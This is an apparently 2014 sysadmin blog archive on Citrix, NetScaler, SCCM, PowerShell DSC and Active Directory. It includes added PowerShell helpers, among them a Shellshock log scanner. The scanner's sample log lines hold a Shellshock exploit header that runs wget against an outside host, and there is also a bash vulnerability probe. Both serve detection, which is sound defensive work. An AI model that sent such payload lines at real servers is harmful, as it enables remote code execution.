Tuesday, October 14, 2014

Netscaler CLI to load balance DNS

Ahhhh, coffee and Netscaler CLI in the morning. It's going to be an awesome day!

I've always been comfortable at the command line. Back in the day I enjoyed poking around in DOS, and later on in Linux, Cisco, and Brocade. These days I don't get to do much networking as I'm much more focused on Citrix in my job duties.

Netscalers are almost a black box to many IT workers. There is little available in the way of books and training videos on Netscaler outside of Citrix eDocs and costly Citrix training. Learning Netscaler has been on my to-do list for quite a long time. We have two in my network that haven't been used for anything beyond Citrix Access Gateway until recently. If I'm going to learn something, doing it by CLI and understanding the command syntax is going to stick in my brain and is going to be more efficient than clicking around a GUI.

This morning I'm configuring DNS load balancing on Netscaler 10.5 by way of the command line.

# In the proxy mode a DNS service type VIP is created
# To this VIP, external DNS servers are bound.
# DNS-VIP: 10.104.20.184
# External DNS Servers: 203.124.140.19; 203.124.140.20
# NetScaler appliance will respond to DNS queries on 10.104.20.184 port 53

# Enable the Load Balancing feature:
enable ns feature lb

# Add external DNS servers:
add service ext_dns_1 203.124.140.19 dns 53
add service ext_dns_2 203.124.140.20 dns 53

# Create a custom DNS monitor for each service. (Using the default dns monitor
# will result in a state of DOWN. Using the default ping monitor is a bad idea:
# I've seen servers respond to pings even though essential services were down
# and I couldn't RDP into the server.)

add lb monitor ext_dns_1 DNS -query host.domain.com -queryType Address -LRTM ENABLED -destIP 203.124.140.19 -destPort 53 -IPAddress <IPofHost>

add lb monitor ext_dns_2 DNS -query host.domain.com -queryType Address -LRTM ENABLED -destIP 203.124.140.20 -destPort 53 -IPAddress <IPofHost>

# Bind each monitor to its service (syntax: bind lb monitor <monitorName> <serviceName>):
bind lb monitor ext_dns_1 ext_dns_1
bind lb monitor ext_dns_2 ext_dns_2

# Create a DNS virtual server:
add lb vserver vdns dns 10.104.20.184 53

# Bind the external DNS services to the DNS virtual server:
bind lb vserver vdns ext_dns_1
bind lb vserver vdns ext_dns_2
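Once the VIP is up, the thing to verify is exactly what the custom monitor verifies: that each backend (and then the VIP) answers the probe name with the expected address, and how long it takes. The PowerShell below is an added example, not part of the original post or of Citrix's tooling; it assumes Resolve-DnsName (Windows 8 / Server 2012 or later) and keeps the post's host.domain.com and <IPofHost> placeholders. One caveat the config itself doesn't state: the VIP answers any client that can reach it on port 53, so keep 10.104.20.184 on trusted networks or behind an ACL; a forwarder reachable from the internet is an amplification source.

```powershell
# Added example (not from the original post): probe each backend and the VIP the
# way the custom DNS monitor does and report what the monitor would conclude.
# Assumptions: Resolve-DnsName is available; host.domain.com and <IPofHost> are
# the same placeholders used in the NetScaler commands above.

function Test-DnsBackend {
    param(
        [Parameter(Mandatory)][string[]]$Server,     # DNS servers and/or the VIP to probe
        [Parameter(Mandatory)][string]$Query,        # the -query name in the monitor
        [Parameter(Mandatory)][string]$ExpectedIP,   # the -IPAddress value in the monitor
        [int]$Attempts = 3                           # retries before calling it DOWN
    )
    foreach ($s in $Server) {
        $result = [pscustomobject]@{ Server = $s; State = 'DOWN'; Answer = $null; Ms = $null; Error = $null }
        for ($i = 1; $i -le $Attempts; $i++) {
            $sw = [System.Diagnostics.Stopwatch]::StartNew()
            try {
                # -DnsOnly skips NetBIOS/LLMNR and -NoHostsFile skips the local hosts file,
                # so the answer really comes from $s, as it does for the monitor's probe.
                $rec = Resolve-DnsName -Name $Query -Type A -Server $s -DnsOnly -NoHostsFile -ErrorAction Stop
                $sw.Stop()
                $ips = @($rec | Where-Object { $_.Type -eq 'A' } | ForEach-Object { $_.IPAddress })
                $result.Answer = $ips -join ','
                $result.Ms = $sw.ElapsedMilliseconds
                # The monitor only marks the service UP when the expected address is in the answer.
                if ($ips -contains $ExpectedIP) { $result.State = 'UP'; $result.Error = $null; break }
                $result.Error = "answer did not contain $ExpectedIP"
            } catch {
                $sw.Stop()
                $result.Error = $_.Exception.Message
            }
        }
        $result
    }
}

# Usage: the two backends from the post, then the VIP once it is configured.
Test-DnsBackend -Server '203.124.140.19','203.124.140.20','10.104.20.184' `
                -Query 'host.domain.com' -ExpectedIP '<IPofHost>' | Format-Table -AutoSize
```

A backend that shows DOWN here with "answer did not contain" is the same situation that made the default dns monitor fail: the server answers, but not with the address the monitor was told to expect, so check the -IPAddress value before blaming the server.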

Friday, September 26, 2014

CVE-2014-6271 Shellshock and Sonicwall IPS Signature gaffe?

If you manage a Sonicwall firewall, be aware that, for some strange reason, Sonicwall made the Shellshock signature a "Low" priority. If you've enabled IPS on your Sonicwall firewall and don't have "Prevent All" and "Detect All" checked for low-priority attacks, then you're not protected. WTH? The CVE and every report rate it high, a 10/10, so why the hell would Sonicwall mark it as low?

If you don't want to check Prevent and/or Detect for all low-priority signatures, you can still block Shellshock by searching for Signature ID 10529 and setting Prevention and Detection to Enable, which I recommend you do like, yesterday.
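Fixing the signature priority covers the perimeter; you'll also want to know whether anyone already tried it against you and whether any bash you run is still vulnerable. The PowerShell below is an added example, not from the original post or from Sonicwall: the first function scans web server access logs for the "() {" function-export prefix the exploit carries in a header, over a few constructed sample lines; the second runs the public CVE-2014-6271 check against whatever bash is on the PATH (Cygwin, Git Bash, or run it on a Linux box).

```powershell
# Added example (not from the original post): detection over web logs plus the
# local bash check for CVE-2014-6271. The log lines are constructed for the example.

function Find-ShellshockAttempt {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Line)
    begin {
        # The trigger is a bash function export "() {" in any header a CGI handler copies
        # into the environment (User-Agent, Referer, Cookie, ...). Tolerate "(){" and "()%20{".
        $pattern = '\(\)\s*(%20)?\s*\{'
    }
    process {
        if ($Line -match $pattern) {
            $ts  = if ($Line -match '\[([^\]]+)\]') { $Matches[1] } else { '' }
            $src = ($Line -split ' ')[0]
            [pscustomobject]@{ Time = $ts; Source = $src; Line = $Line }
        }
    }
}

function Test-BashShellshock {
    # Returns 'vulnerable', 'patched', or 'no-bash'. A vulnerable bash executes the
    # trailing command when it imports the function from the environment.
    if (-not (Get-Command bash -ErrorAction SilentlyContinue)) { return 'no-bash' }
    $env:SHELLSHOCK_PROBE = '() { :;}; echo vulnerable'
    try {
        $out = & bash -c 'echo probe' 2>&1
        if ($out -match 'vulnerable') { 'vulnerable' } else { 'patched' }
    } finally {
        Remove-Item Env:\SHELLSHOCK_PROBE -ErrorAction SilentlyContinue
    }
}

# Constructed sample lines in combined-log format. Lines 1 and 4 are benign
# (line 4 has "()" in the path but no "{"); lines 2 and 3 carry the exploit prefix.
$sampleLog = @(
    '10.0.0.5 - - [26/Sep/2014:10:01:02 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Sep/2014:10:01:09 -0400] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; /bin/bash -c ''wget http://198.51.100.7/x''"',
    '203.0.113.9 - - [26/Sep/2014:10:02:44 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { ignored; }; echo vulnerable" "curl/7.30"',
    '10.0.0.6 - - [26/Sep/2014:10:03:00 -0400] "GET /about() HTTP/1.1" 404 0 "-" "Mozilla/5.0"'
)

$sampleLog | Find-ShellshockAttempt | Format-Table Time, Source -AutoSize
"local bash: $(Test-BashShellshock)"
```

To run the scan on a real IIS or Apache log, replace $sampleLog with Get-Content on the log file; the pattern is deliberately loose, so review hits rather than alerting on them blindly.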


Monday, September 15, 2014

WMI Explorer Utility

WMI Explorer looks like a useful tool for the Windows and SCCM admin. From http://wmie.codeplex.com/

WMI Explorer is a utility intended to provide the ability to browse and view WMI namespaces/classes/instances/properties in a single pane of view.

Features

• Ability to browse and view WMI namespaces/classes/instances/properties in a single pane of view.
• Ability to provide alternate credentials for connecting to remote computers.
• Ability to filter classes and instances matching specified criteria.
• Ability to view classes/instances in Managed Object Format (MOF).
• Ability to search classes, methods and properties with names matching specified criteria.
• Ability to run custom WQL queries.
• Automatic generation of WQL query for the selected Class/Instance.
• Automatic script creation (PowerShell and VBS).
• Highlighting of objects that have been previously viewed in the same session.
• Lists property enumeration values (if available). This is generally useful for SMS Provider classes.
• Lists property values containing embedded objects. This is especially useful for SMS Provider classes.
• Caching of retrieved classes/instances.

Friday, September 5, 2014

100 Days of DevOps with PowerShell

If you are a Windows admin, you need to get on the bus with DevOps before you get left behind. I used to think of DevOps as a Linux admin thing. With PowerShell 4.0 and Windows Server 2012 R2, DevOps is here for Windows.

Why do you need DevOps or PowerShell on Windows systems? For starters, even though some tasks take less time to do by hand than to script, any repeatable process benefits from automation with PowerShell. If you have servers that share a common configuration, like web, email, or database servers, you can use PowerShell Desired State Configuration to apply and enforce that configuration.

From the System Center Central blog:

What is PowerShell DSC?

Desired State Configuration (DSC) is a feature in PowerShell 4.0 and Windows Server 2012 R2 that helps Windows administrators manage and deploy software services’ configuration data and the environment the services run in.
DSC provides a set of PowerShell language extensions, cmdlets and a process called declarative scripting. The goal of DSC is to provide administrators with a method for maintaining consistent configuration sets across computers or devices.  You can write an expression describing a system configuration, and the system will evaluate and apply the configuration. Common use cases for PowerShell DSC include (but are not limited to):
  • Enabling or disabling server roles and features (like IIS)
  • Deploying new software
  • Deploying an IIS website (including the site content)
  • Managing registry settings
  • Running Windows PowerShell scripts
  • Managing files and directories
  • Starting, stopping, and managing processes and services
  • Managing groups and user accounts
  • Managing environment variables
  • Fixing a configuration that has drifted away from the desired state
  • Discovering the actual configuration state on a given node
The bottom line is PowerShell DSC enables IT Pros to support consistent, standardized configuration and continuous deployment, both core goals of DevOps.
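Here is what that list looks like as an actual configuration. This is an added example, not code from the original post or from the System Center Central article: it declares a baseline for a pair of IIS servers (role present, a legacy role absent, the web service running, one SCHANNEL registry value set, site content copied from a share), compiles it to one MOF per node, pushes it, and then checks for drift. It assumes PowerShell 4.0 / Server 2012 R2 on the targets; the node names WEB01 and WEB02, the share path, and the chosen settings are illustrative.

```powershell
# Added example (not from the original post): a DSC configuration covering the
# use cases in the list above, applied in push mode from a management host.
# Assumptions: WMF 4.0 targets named WEB01/WEB02; the LCM runs as SYSTEM, so the
# computer accounts need read access to \\fileserver\webcontent\intranet.

Configuration WebServerBaseline {
    param([string[]]$ComputerName = 'localhost')

    Import-DscResource -ModuleName PSDesiredStateConfiguration

    Node $ComputerName {
        # Roles and features: IIS present, the FTP server role absent.
        WindowsFeature IIS {
            Name   = 'Web-Server'
            Ensure = 'Present'
        }
        WindowsFeature NoFtp {
            Name   = 'Web-Ftp-Server'
            Ensure = 'Absent'
        }
        # Services: W3SVC running and set to start automatically.
        Service W3SVC {
            Name        = 'W3SVC'
            StartupType = 'Automatic'
            State       = 'Running'
            DependsOn   = '[WindowsFeature]IIS'
        }
        # Registry: one line of a TLS baseline, disabling SSL 3.0 on the server side.
        Registry DisableSsl3Server {
            Key       = 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server'
            ValueName = 'Enabled'
            ValueType = 'Dword'
            ValueData = '0'
            Ensure    = 'Present'
        }
        # Files: the site root exists and mirrors the approved content share.
        File SiteContent {
            SourcePath      = '\\fileserver\webcontent\intranet'
            DestinationPath = 'C:\inetpub\wwwroot\intranet'
            Type            = 'Directory'
            Recurse         = $true
            Ensure          = 'Present'
            DependsOn       = '[WindowsFeature]IIS'
        }
    }
}

# Compile: writes WEB01.mof and WEB02.mof into .\WebServerBaseline
WebServerBaseline -ComputerName 'WEB01','WEB02' -OutputPath .\WebServerBaseline

# Push the configuration and wait for the result.
Start-DscConfiguration -Path .\WebServerBaseline -Wait -Verbose

# Later (or on a schedule): report whether each node has drifted from the MOF.
Test-DscConfiguration -CimSession 'WEB01','WEB02'
```

Test-DscConfiguration returning False is the "fixing a configuration that has drifted" case from the list: rerun Start-DscConfiguration with the same path, or set the LCM's ConfigurationMode to ApplyAndAutoCorrect so the node fixes itself on its next consistency check.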

Thursday, September 4, 2014

Force Desktops to launch in full screen mode in XenDesktop and XenApp 7.5

In earlier versions of XenApp you could make a desktop full screen in the published application settings. In XenApp/XenDesktop 7.5 this setting is no longer available. It's a little bit of an annoyance to have to click the top menu of Desktop Viewer to make it full screen, but even then it won't stretch across both screens in a dual monitor setup.

Lal Mohan at Citrixology has a very good post on how to edit StoreFront to launch a desktop in full screen mode.

On your StoreFront server, open the C:\inetpub\wwwroot\Citrix\<StoreName>\App_Data\default.ica file in Notepad, and add the line "DesktopViewer-ForceFullScreenStartup=true" under the [Application] section.
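If you have more than one store, or want the change repeatable after a StoreFront upgrade rewrites the file, the same edit can be scripted. The PowerShell below is an added example, not from the original post or from Citrixology: it walks every store under C:\inetpub\wwwroot\Citrix, finds the [Application] section of default.ica, and adds or corrects the setting without duplicating it, backing the file up first. It assumes the default StoreFront install path.

```powershell
# Added example (not from the original post): idempotent edit of a setting in
# the [Application] section of each store's default.ica.
# Assumes StoreFront's default layout C:\inetpub\wwwroot\Citrix\<StoreName>\App_Data.

function Set-DefaultIcaSetting {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Value,
        [string]$Section = 'Application'
    )
    $lines = New-Object System.Collections.Generic.List[string]
    foreach ($l in (Get-Content -LiteralPath $Path)) { $lines.Add($l) }

    # Locate the [Section] header; append the section if the file lacks it.
    $start = -1
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i].Trim() -ieq "[$Section]") { $start = $i; break }
    }
    if ($start -lt 0) { $lines.Add("[$Section]"); $start = $lines.Count - 1 }

    # Scan up to the next header (or EOF) for an existing Name= line.
    $idx = -1
    for ($i = $start + 1; $i -lt $lines.Count; $i++) {
        if ($lines[$i].Trim().StartsWith('[')) { break }
        if ($lines[$i] -match ('^\s*' + [regex]::Escape($Name) + '\s*=')) { $idx = $i; break }
    }

    $setting = "$Name=$Value"
    if ($idx -ge 0 -and $lines[$idx] -eq $setting) { return "unchanged: $Path" }
    if ($idx -ge 0) { $lines[$idx] = $setting } else { $lines.Insert($start + 1, $setting) }

    Copy-Item -LiteralPath $Path -Destination "$Path.bak" -Force
    Set-Content -LiteralPath $Path -Value $lines.ToArray() -Encoding ASCII
    "updated: $Path"
}

# Apply to every store that has a default.ica (StoreWeb and Roaming have none and are skipped).
Get-ChildItem 'C:\inetpub\wwwroot\Citrix' -Directory |
    ForEach-Object { Join-Path $_.FullName 'App_Data\default.ica' } |
    Where-Object { Test-Path -LiteralPath $_ } |
    ForEach-Object { Set-DefaultIcaSetting -Path $_ -Name 'DesktopViewer-ForceFullScreenStartup' -Value 'true' }
```

In a server group, run it on one node and then propagate the change from the StoreFront console, or run it on every node; a store whose default.ica differs between nodes will behave differently depending on which server the load balancer picks.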



Thursday, August 28, 2014

How to Change the Server Base URL from HTTP to HTTPS on Citrix StoreFront

Complete the following steps to change the base URL:
  1. Go to StoreFront and click Server Group on the left panel.
  2. Click Change Base URL on the right panel.
  3. Type the base URL and click OK.

Use the https:// form of the name that matches the server certificate bound to the IIS site; Receiver compares the two and will refuse a store whose base URL and certificate disagree.


XenApp or XenDesktop applications fail to launch

When accessing my StoreWeb URL, I clicked on an application icon and it would never launch, and at the bottom of the icon the circle would spin continuously. Citrix article CTX128009 fixed the issue.

Configure the application launch time-out with the following registry value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Citrix\wfshell\TWI
Name: ApplicationLaunchWaitTimeoutMS
Type: REG_DWORD
Data: <required additional time-out, in milliseconds>
Note: Specifying a value of less than 10000 reverts to 10000 because 10 seconds is the minimum override.

Create the following value under the same key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Citrix\wfshell\TWI):
Value Name: LogoffCheckerStartupDelayInSeconds
Type: REG_DWORD
Value: An integer that denotes the time to wait for the application to start (10 hexadecimal recommended)
Note: Setting this value also increases the time it takes for a user to log off the server. It is more useful as a troubleshooting step to confirm that the issue is due to the length of time required for your application to launch.

No certificate templates could be found Server 2008 R2

While attempting to request a web server certificate for my XenApp/XenDesktop Delivery Controller for use with Storefront, I get this error from the CA: "No certificate templates could be found. You do not have permission to request a certificate from this CA, or an error occurred while accessing the Active Directory."


I found this gem from John Nobile on social.technet.microsoft.com:
Instead of using IIS Manager to generate the request, you can do so manually. Open the machine certificate MMC snap-in (mmc.exe -> File -> Add/Remove Snap-in -> Certificates -> Add -> Computer Account -> Next -> Local Computer -> Finish -> OK). Right-click the Certificates node under the "Personal" store. Select All Tasks -> Request New Certificate. When selecting the Web Server template from the enrollment wizard, open the template details and add both the machine name and fully qualified machine name of the web server as Common Names to the certificate subject.

Sunday, August 24, 2014

Slow XenApp 5 logons on Server 2008

My XenApp 5 farm published desktops running on Windows Server 2008 x86 had logon times averaging 69 seconds. Group Policy Registry items were taking 40 seconds as seen in the event logs.

I found Citrix article CTX128749. I added a new GPO with a scheduled task containing:
rd "C:\ProgramData\Microsoft\Group Policy\history" /s /q
I ran the command, restarted all servers, and then timed logons: they had dropped from 69 to 33 seconds. I can live with 33-second logons.

Thanks and a shout out to robissimo for pointing the Citrix article out to me.

Thursday, August 21, 2014

Creating Mandatory profiles

Over time I've noticed that as the number of GPO settings applied to my Citrix servers grows, so do the user logon times. I'm using XenApp to provide shared hosted desktops, and the logon times have grown to around a minute.

The solution is to use Mandatory profiles (and redirected folders) as long as users don't need to save changes. That fits the bill for shared hosted desktops on a server. Instead of having a large number of user GPO settings applied at logon, we're going to customize the profile, save it to a network share, and set a GPO to use this profile for all users. Now you have a profile with all settings already applied, and you can eliminate many of the GPOs you were previously waiting on. You can use Mandatory profiles along with redirected folders so that users still get their own Desktop and Documents folders.

Instead of creating yet another tutorial, I'm going to point you to Rob Beekman's excellent blog post on how to create a Mandatory profile.

XenDesktop and XenApp black or frozen screen

This issue affects XenApp 7.5; XenDesktop 7.1 and 7.5 VDA Core Services for Windows Server OS (64-bit). After launching a published desktop or application, the screen may be completely black, or it may freeze.

Since this issue affects the default graphics mode, I'm scratching my head, amazed that Citrix doesn't include this fix in the ISO download of XenDesktop/XenApp 7.x. To make matters worse, you can't just visit the Citrix site and download this hotfix; you have to open a support ticket and they must email you a download link.

See CTX139901 for more info.

How to disable Citrix desktop auto launch in StoreFront

I'm not sure why Citrix thought it would be a good idea to automatically launch a published desktop in the Citrix Receiver for Web (StoreWeb) site in StoreFront and assumed that users wouldn't want to launch an application instead. It seems logical to not auto launch a desktop and have the administrator edit this config file value if they DO want it to auto launch.

To disable desktop auto launch:
  1. Go to the C:\inetpub\wwwroot\Citrix\StoreWeb directory.
  2. Open the Web.config file with Notepad.
  3. Set the autoLaunchDesktop parameter to "false".
  4. Save the web.config file.
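Because web.config is XML, a typo in Notepad takes the whole Receiver for Web site down with a 500 error, so I prefer to make the change through the XML API. The PowerShell below is an added example, not from the original post: it loads the file, finds whichever element carries the autoLaunchDesktop attribute (located by attribute so the element name is not assumed), sets it, and saves with a backup. It assumes the default StoreWeb path.

```powershell
# Added example (not from the original post): set autoLaunchDesktop in the
# Receiver for Web site's web.config without hand-editing the XML.
# Assumes the default path C:\inetpub\wwwroot\Citrix\StoreWeb\web.config.

function Set-StoreWebAutoLaunchDesktop {
    [CmdletBinding()]
    param(
        [string]$WebConfig = 'C:\inetpub\wwwroot\Citrix\StoreWeb\web.config',
        [ValidateSet('true','false')][string]$Value = 'false'
    )
    $xml = New-Object System.Xml.XmlDocument
    $xml.PreserveWhitespace = $true      # keep the file's existing layout on save
    $xml.Load($WebConfig)

    $nodes = $xml.SelectNodes('//*[@autoLaunchDesktop]')
    if ($nodes.Count -eq 0) { throw "autoLaunchDesktop attribute not found in $WebConfig" }

    $changed = $false
    foreach ($n in $nodes) {
        $current = $n.GetAttribute('autoLaunchDesktop')
        if ($current -ne $Value) {
            Write-Verbose ("<{0}>: autoLaunchDesktop {1} -> {2}" -f $n.Name, $current, $Value)
            $n.SetAttribute('autoLaunchDesktop', $Value)
            $changed = $true
        }
    }
    if ($changed) {
        Copy-Item -LiteralPath $WebConfig -Destination "$WebConfig.bak" -Force
        $xml.Save($WebConfig)   # IIS picks up web.config changes on its own; no iisreset needed
    }
    [pscustomobject]@{ File = $WebConfig; Changed = $changed; Value = $Value }
}

Set-StoreWebAutoLaunchDesktop -Value 'false' -Verbose
```

Run it with -Value 'true' to put the default back; on a server group, apply it on each node or propagate the change from the console so all nodes behave the same.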

Tuesday, August 19, 2014

XenApp and XenDesktop 7.5 MCS creating Machine Catalogs and can't add VM's from vCenter 5.5

I'm building a XenApp 7.5 environment (same code as XenDesktop 7.5, only a different license) and hitting a wall when creating Machine Catalogs. Under the step "import or add virtual machines", I click the "Add VMs" button, can't browse past the top level of my vCenter cluster, and can't see any VMs. I checked http://support.citrix.com/proddocs/topic/xenapp-xendesktop-75/cds-vmware-rho.html and the account I'm using meets the permissions requirements. I know that the issue isn't with this XenApp Delivery Controller because I am able to connect to our secondary data center and browse VMs from this same controller.

I opened a support ticket with Citrix and VMware and after two weeks it still wasn't working.

While I was looking at the differences between the working and non-working data centers, I noticed that in the working data center I can only see VMs that are not part of a vApp in the Citrix Studio console. I moved my XenApp 7.5 VMs out of the vApp and I can now connect to them with Citrix Studio.

If you are connecting XenApp or XenDesktop 7.5 to VMware vCenter 5.5, don't place your Citrix virtual machines to be managed inside of a vApp. I can't verify this issue on other versions of Citrix XenDesktop/XenApp or VMware vCenter.

The system cannot find the file specified failed to resolve the source 0x80070002

Some days SCCM will have you pulling your hair out in frustration. I frequently get errors when my OSD TS are installing programs or applications. It will work fine one time then fail the next.

This is the error I'm talking about:
Severity,Type,Site code,Date / Time,System,Component,Message ID,Description
Error,Milestone,NFK,8/19/2014 11:56:08 AM,COMPUTERNAME,Task Sequence Engine,11135,The task sequence execution engine failed executing the action (Run Command Line Copy default backgound image) in the group (Setup Operating System) with the error code 2147942402  Action output: ... 02 (e:\nts_sccm_release\sms\framework\tscore\resolvesource.cpp,3273) TS::Utility::ResolveSource (pszPkgID, sPath, 0, hUserToken, mapNetworkAccess), HRESULT=80070002 (e:\nts_sccm_release\sms\client\osdeployment\installsoftware\runcommandline.cpp,399)cmd.Execute(pszPkgID, sProgramName, dwCmdLineExitCode), HRESULT=80070002 (e:\nts_sccm_release\sms\client\osdeployment\installsoftware\main.cpp,372) WinHttpSendRequest failed. SendWinHttpRequest failed. 80072ee2. DownloadFile() failed for http://SERVER -FQDN:80/SMS_DP_SMSPKG$/NFK00079/sccm?/backgroundDefault.jpg, C:\_SMSTaskSequence\Packages\NFK00079\backgroundDefault.jpg. 80072ee2. Error downloading file from http://SERVER -FQDN:80/SMS_DP_SMSPKG$/NFK00079/sccm?/backgroundDefault.jpg toC:\_SMSTaskSequence\Packages\NFK00079\backgroundDefault.jpg  DownloadFiles() failed. 80072ee2. Download() failed. 80072ee2. Failed to resolve the source for SMS PKGID=NFK00079, hr=0x80070002 Install Software failed to run command line, hr=0x80070002. The operating system reported error 2147942402: The system cannot find the file specified.
To fix this, add the following Task Sequence Variables to the top of your TS.
SMSTSDownloadRetryCount = 5
SMSTSDownloadRetryDelay = 15

Configuring Automatic Deployment Rules for Software Updates in SCCM 2012

When deploying Microsoft updates, delaying them is as important as applying them: that is how you avoid pushing a bad update with unintended consequences, including the dreaded BSOD. In this post I'm going to show how to deploy MS updates using an Automatic Deployment Rule (ADR) in System Center Configuration Manager 2012 R2.

I have experimented with different patch schedules and methods over the years, and I'm going to outline what works best for me.

Every month I wait until a week after Patch Tuesday and deploy the updates to my own computer. (Waiting a week gives bleeding-edge users time to report issues and Microsoft time to pull a patch if necessary.) If there are going to be any BSODs, I would rather catch them first than have a few hundred or thousand of my users catch them.

After I let the updates "bake" on my computer for a week without issues, I deploy them to a small group of users: people who are generally easy to work with and usually don't have pressing deadlines. I sometimes refer to this group as "the canary in the coal mine", because coal miners used a caged canary back in the old days to warn them of toxic gases; the gas would kill the bird before it affected the miners. If the canary drops dead, back out quickly!

After the "canary" group bakes with the updates for a week without issue, it's time to deploy them to the rest of the computers, including laptops. Some users take their laptop home nightly and may miss the collection's maintenance window of 4 to 7 AM, so for these offsite laptops I deploy the updates a week after the bulk of the users. This gives the laptop users a chance to return to the office and pick up the updates during the maintenance window. If that window is missed, the only effective way to get it done is to push the updates during working hours around lunch time and suppress the restart. This may not be ideal, but what else are you going to do if they take the laptop home every night?

In the SCCM console, select Software Library, expand Software Updates and select Automatic Deployment rules. Click the button for "Create Automatic Deployment Rule".


Name your ADR and provide a description if you desire. Select a Deployment Template if you have created any. Select your collection, and select Create a new Software Update Group, and click Next.



On the Deployment Settings dialog, select "Use Wake-on-LAN" if you desire. I don't use this feature, as all of my computers automatically power on for the 4 AM maintenance window via BIOS settings. Click Next.

On the Software Updates dialog, set your property filters to select the updates you want. In my case I exclude a particular Bulletin ID that we have found to cause problems with our deployed applications by preceding it with a minus.



Specify the Evaluation Schedule.



Specify the Deployment Schedule.


Specify the User Experience. I prefer to select "Hide in Software Center", and leave all boxes unchecked so that they only deploy during the collection's maintenance window. Click Next.


Specify an alert of 90 percent and 7 days, unless you prefer otherwise.


I leave the defaults selected on the Download Settings dialog, and click Next.


Select a Deployment Package if one exists, otherwise create a new deployment package and specify the source, then click Next.


Select your Distribution Points or Distribution Point Group.


Accept the default on the Download Location dialog, and click Next.

Make the appropriate language selection, and click Next.

Carefully review the Summary page, click Save as a Template, and click Next if you don't need to make any changes, then click Close.

Repeat this process for any other operating systems you manage, making changes as necessary.


Monday, August 18, 2014

Citrix products at a glance...


How to Configure Citrix Receiver Pass-Through Authentication for StoreFront or Web Interface


Desktop Virtualization Deployment Insights eBook

Printing IS important in the VDI environment

I manage a Citrix XenApp system. Recently during a business lunch our sales rep told us that his customers have had "great success" with VMware Horizon View as a Citrix replacement.

From what I've been reading on comparisons of VMware vs Citrix VDI, VMware is a little immature at the moment. I consider Citrix XenDesktop and XenApp to be mature and complete end to end products. Profile management? Check. Universal Printing? Check. Remote access? Check. (Netscaler) Then you also have GoToMeeting, GoToWebinar, Sharefile, and MDM. At first glance it looks like it would be easy to upgrade a Citrix environment with VMware Horizon View 6. VMware's webinar I watched recently said you just install the Horizon agent on your Citrix server to publish apps and you don't even have to uninstall Citrix.

The reality is that VMware Horizon View 6 lacks some key features, including universal printing and profile management. To be fair, if you are doing VDI on a Windows desktop OS, VMware has universal printing. However if you are publishing a desktop or application on a server OS, no universal printing. I think I'll stick with Citrix, thank you.

Here's a good summary of the differences between Citrix and VMware VDI client printing support.

Sunday, August 17, 2014

User changed password in AD and keeps getting locked out

I've noticed that Active Directory account lockouts seem to be more common these days. I believe this is a result of the use of mobile devices, with some users having multiple mobile devices.

The most common cause of account lockout is when a user changes their password and doesn't immediately update their password on a mobile device with an email account configured for ActiveSync. I've even had one person tell me that they did update their password on their iPhone, then after repeated account lockouts they remembered the iPad they left at home that also had their company email account on it.

If mobile devices with ActiveSync accounts aren't the cause, I recommend using Account Lockout Examiner, a freeware tool from Netwrix.

Netwrix Account Lockout Examiner: Alert your help desk staff about lockout events and troubleshoot account lockouts, analyzing potential causes. Accounts can be unlocked within the console, a Web-based interface or via a mobile device.

Download it here.

How to determine when a user changed their AD password with Powershell

Open the Powershell console as admin and type:

Import-Module ActiveDirectory
Get-ADUser 'UserName' -Properties PasswordLastSet | Format-List

Pretty simple.
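Taking the two posts above one step further: the PDC emulator records every lockout as Security event 4740, including the "Caller Computer Name" the bad passwords came from, so you can find the offending device without a third-party tool and line the lockouts up against PasswordLastSet. Lockouts that start right after a password change point to a device still holding the old password, which is the ActiveSync case described above. The PowerShell below is an added example, not from the original posts or from Netwrix; it assumes the ActiveDirectory module and read access to the PDC's Security log, and the account name jdoe is illustrative.

```powershell
# Added example (not from the original posts): correlate 4740 lockout events on
# the PDC emulator with the account's PasswordLastSet.
# Assumptions: ActiveDirectory module present; the caller can read the PDC's
# Security log (Event Log Readers or equivalent).

Import-Module ActiveDirectory

function Get-LockoutSource {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [int]$Hours = 24
    )
    # badPwdCount and lastBadPasswordAttempt are not replicated, so read the user
    # from the PDC, which is also where every lockout is forwarded and logged.
    $pdc  = (Get-ADDomain).PDCEmulator
    $user = Get-ADUser $SamAccountName -Server $pdc `
                -Properties PasswordLastSet, LockedOut, BadPwdCount, LastBadPasswordAttempt

    $events = Get-WinEvent -ComputerName $pdc -FilterHashtable @{
        LogName = 'Security'; Id = 4740; StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    $lockouts = foreach ($e in $events) {
        # 4740 message: "... Account That Was Locked Out: ... Account Name: <user> ...
        #                Additional Information: Caller Computer Name: <host>"
        $who = '(?m)Account Name:\s+' + [regex]::Escape($user.SamAccountName) + '\s*$'
        if ($e.Message -notmatch $who) { continue }
        $caller = if ($e.Message -match 'Caller Computer Name:\s+(\S+)') { $Matches[1] } else { '?' }
        [pscustomobject]@{
            Time                = $e.TimeCreated
            Caller              = $caller
            AfterPasswordChange = ($null -ne $user.PasswordLastSet -and $e.TimeCreated -gt $user.PasswordLastSet)
        }
    }

    [pscustomobject]@{
        User            = $user.SamAccountName
        LockedOut       = $user.LockedOut
        BadPwdCount     = $user.BadPwdCount
        PasswordLastSet = $user.PasswordLastSet
        LastBadPassword = $user.LastBadPasswordAttempt
        Lockouts        = @($lockouts | Sort-Object Time -Descending)
    }
}

$r = Get-LockoutSource -SamAccountName 'jdoe' -Hours 48
$r | Format-List User, LockedOut, BadPwdCount, PasswordLastSet, LastBadPassword
$r.Lockouts | Format-Table Time, Caller, AfterPasswordChange -AutoSize
```

When the Caller is the Exchange CAS or a mobile device name, it's the stale ActiveSync password; when it's a workstation the user isn't sitting at, look for a mapped drive, scheduled task, or service still running under the old credentials on that machine.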

Friday, August 15, 2014

Best sales pitch ever!

